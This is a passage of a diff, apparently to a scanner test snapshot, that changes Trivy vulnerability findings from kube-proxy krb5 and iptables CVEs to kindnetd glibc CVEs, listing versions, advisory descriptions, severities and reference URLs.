"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1025997", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026103", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026704", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", }, { "type": "URL", - "value": "http://www.ubuntu.com/usn/USN-1263-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", }, { "type": "URL", - "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-3389", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", }, { "type": "URL", - "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "value": "https://ubuntu.com/security/notices/USN-4954-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", }, { "type": "URL", - "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3326", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "https://access.redhat.com/security/cve/CVE-2021-3326", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "https://linux.oracle.com/cve/CVE-2021-3326.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210304-0007/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + ], + }, + "category": "Vulnerability", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", + "references": [ { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13154861", + "value": "https://avd.aquasec.com/nvd/cve-2021-3326", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13155432", + "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", }, { "type": "URL", - "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "value": "https://access.redhat.com/security/cve/CVE-2021-3326", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", }, { "type": "URL", - "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-1263-1", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", - ], - }, - "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://ubuntu.com/security/notices/USN-5699-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "references": [ { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-10228", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "http://openwall.com/lists/oss-security/2017/03/01/10", + "http://www.securityfocus.com/bid/96525", + "https://access.redhat.com/security/cve/CVE-2016-10228", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "https://linux.oracle.com/cve/CVE-2016-10228.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "glibc: iconv program can hang when invoked with the -c option", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2016-10228", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "http://openwall.com/lists/oss-security/2017/03/01/10", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "http://www.securityfocus.com/bid/96525", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2016-10228", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libip4tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libip6tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-25013", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2019-25013", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", + "https://linux.oracle.com/cve/CVE-2019-25013.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210205-0004/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://avd.aquasec.com/nvd/cve-2019-25013", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2019-25013", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", }, { "type": "URL", - "value": 